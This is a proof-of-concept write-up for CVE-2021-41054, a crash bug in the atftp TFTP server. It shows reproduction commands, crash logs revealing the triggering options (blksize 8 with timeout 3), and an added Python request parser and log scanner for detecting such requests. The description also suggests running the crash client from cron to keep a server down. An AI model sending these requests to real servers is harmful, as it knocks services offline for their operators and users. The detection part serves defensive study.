CVE-2021-41054

Description:

tftpd_file.c in atftp through 0.7.4 has a buffer overflow because buffer-size handling does not properly consider the combination of data, OACK, and other options. An attacker with layer-2 network access to the server can run a malicious client (such as this PoC) to crash the server whenever it is reachable, or schedule it as a cron job so the server is brought down on every run.

Idea by:

  • Martin Dummer

Author of the PoC client and the TestServ.sh automation:

  • @nu11secur1ty

Reproduce:

  • Run TestServ.sh:

```shell
bash TestServ.sh
```

  • Output:

```text
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]: Advanced Trivial FTP server started (0.7)
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   running in daemon mode on port 2000
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   logging level: 7
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:      trace enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   directory: tmp/
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   user: root.root
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   log file: /dev/stdout
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   not forcing to listen on local interfaces.
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   server timeout: Not used
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   tftp retry timeout: 5
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   maximum number of thread: 100
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option timeout:   enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option tzise:     enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option blksize:   enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:   option multicast: enabled
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:      address range: 239.255.0.0-255
Oct 15 12:14:06 nu11secur1ty-dev atftpd[3645.140540916002560]:      port range:    1758
```

  • Run PoC-client.sh:

```shell
bash PoC-client.sh
```

  • Output:

```text
Trace mode on.
Option blksize = 8
Option timeout = 3
sent RRQ <file: tmp/nu11secur1ty.txt, mode: octet <timeout: 3, blksize: 8>>
timeout: retrying...
```

Test Output:

  • (core dumped) /usr/sbin/atftpd

```text
Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: timeout option -> 3
Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: blksize option -> 8
Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: sent OACK <timeout: 3, blksize: 8>
TestServ.sh: line 8:  3276 Segmentation fault      (core dumped) /usr/sbin/atftpd --user=$(id -un) --group=$(id -gn) --daemon --no-fork --trace --logfile=/dev/stdout --verbose=7 --port 2000 tmp
Trace mode on.
Option blksize = 8
Usage: connect host-name [port]
Not connected.
```
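The crash above is triggered by a request that negotiates a tiny `blksize` together with a `timeout` option, which is exactly what the PoC client logs as `sent RRQ <... <timeout: 3, blksize: 8>>`. The following is an added example from the defender's side, not code from this repository or from atftp: a parser for TFTP read/write requests with RFC 2347 options, plus a scanner for atftpd `--trace` log lines, so that requests of that shape can be flagged before or after they reach a server. The RFC 2348/2349 option ranges are real; `MIN_POLICY_BLKSIZE`, the function names and the sample packet are assumptions made for the example.

```python
"""
Added example (not part of the CVE-2021-41054 PoC repository or of atftp):
parse RFC 1350 RRQ/WRQ packets carrying RFC 2347 options and scan atftpd
--trace log lines, flagging requests that negotiate a tiny blksize together
with other options.  Ranges follow RFC 2348 (blksize 8..65464) and RFC 2349
(timeout 1..255); MIN_POLICY_BLKSIZE is an assumed local policy value.
"""
import re

OPCODE_RRQ = 1
OPCODE_WRQ = 2
VALID_MODES = {"netascii", "octet", "mail"}

# Numeric option ranges from RFC 2348 (blksize) and RFC 2349 (timeout).
OPTION_BOUNDS = {"blksize": (8, 65464), "timeout": (1, 255)}
# Assumed policy: block sizes below the 512-byte default are suspicious on a
# server whose legitimate clients never ask for them.
MIN_POLICY_BLKSIZE = 512


def parse_request(packet: bytes) -> dict:
    """Parse an RRQ/WRQ: opcode, filename\\0, mode\\0, then name\\0value\\0 pairs."""
    if len(packet) < 4:
        raise ValueError("packet too short")
    opcode = int.from_bytes(packet[:2], "big")
    if opcode not in (OPCODE_RRQ, OPCODE_WRQ):
        raise ValueError(f"not a request opcode: {opcode}")
    if packet[-1] != 0:
        raise ValueError("request not NUL-terminated")
    fields = [f.decode("ascii", "replace") for f in packet[2:-1].split(b"\x00")]
    if len(fields) < 2:
        raise ValueError("missing filename or mode")
    filename, mode, *opts = fields
    if mode.lower() not in VALID_MODES:
        raise ValueError(f"unknown transfer mode {mode!r}")
    if len(opts) % 2:
        raise ValueError("option name without a value")
    options = {}
    for name, value in zip(opts[::2], opts[1::2]):
        name = name.lower()
        if name in options:
            raise ValueError(f"duplicate option {name!r}")
        options[name] = value
    return {"opcode": opcode, "filename": filename,
            "mode": mode.lower(), "options": options}


def check_options(options: dict) -> list:
    """Return findings for options that are out of RFC range or violate policy."""
    findings = []
    for name, raw in options.items():
        if name not in OPTION_BOUNDS:
            continue  # tsize, multicast, ... are not range-checked here
        if not raw.isdigit():
            findings.append(f"{name}: non-numeric value {raw!r}")
            continue
        value = int(raw)
        lo, hi = OPTION_BOUNDS[name]
        if not lo <= value <= hi:
            findings.append(f"{name}: {value} outside RFC range {lo}..{hi}")
        elif name == "blksize" and value < MIN_POLICY_BLKSIZE:
            msg = f"blksize: {value} below policy minimum {MIN_POLICY_BLKSIZE}"
            others = sorted(o for o in options if o != "blksize")
            if others:  # the combination the advisory describes
                msg += " (negotiated together with: " + ", ".join(others) + ")"
            findings.append(msg)
    return findings


LOG_OPTION_RE = re.compile(
    r"atftpd\[(?P<pid>[\d.]+)\]: (?P<name>\w+) option -> (?P<value>\S+)")


def scan_atftpd_log(lines) -> dict:
    """Group 'NAME option -> VALUE' trace lines per atftpd pid.thread, run
    check_options on each group and return {pid: findings} for flagged ones."""
    per_pid = {}
    for line in lines:
        m = LOG_OPTION_RE.search(line)
        if m:
            per_pid.setdefault(m["pid"], {})[m["name"].lower()] = m["value"]
    flagged = {}
    for pid, opts in per_pid.items():
        findings = check_options(opts)
        if findings:
            flagged[pid] = findings
    return flagged


# Constructed RRQ with the options the PoC client logs above:
# file tmp/nu11secur1ty.txt, mode octet, timeout 3, blksize 8.
SAMPLE_RRQ = (b"\x00\x01" b"tmp/nu11secur1ty.txt\x00" b"octet\x00"
              b"timeout\x003\x00" b"blksize\x008\x00")
# The two option lines from the Test Output section above.
SAMPLE_LOG = [
    "Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: timeout option -> 3",
    "Oct 15 12:10:50 nu11secur1ty-dev atftpd[3276.140024667366976]: blksize option -> 8",
]

if __name__ == "__main__":
    req = parse_request(SAMPLE_RRQ)
    print(req, check_options(req["options"]), scan_atftpd_log(SAMPLE_LOG), sep="\n")
```

Both the packet path and the log path end in the same `check_options`, so a value that is legal per RFC 2348 (8 is the minimum the RFC allows) can still be reported under local policy; the finding lists the other options negotiated alongside the small block size, since the advisory attributes the overflow to that combination rather than to `blksize` alone.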
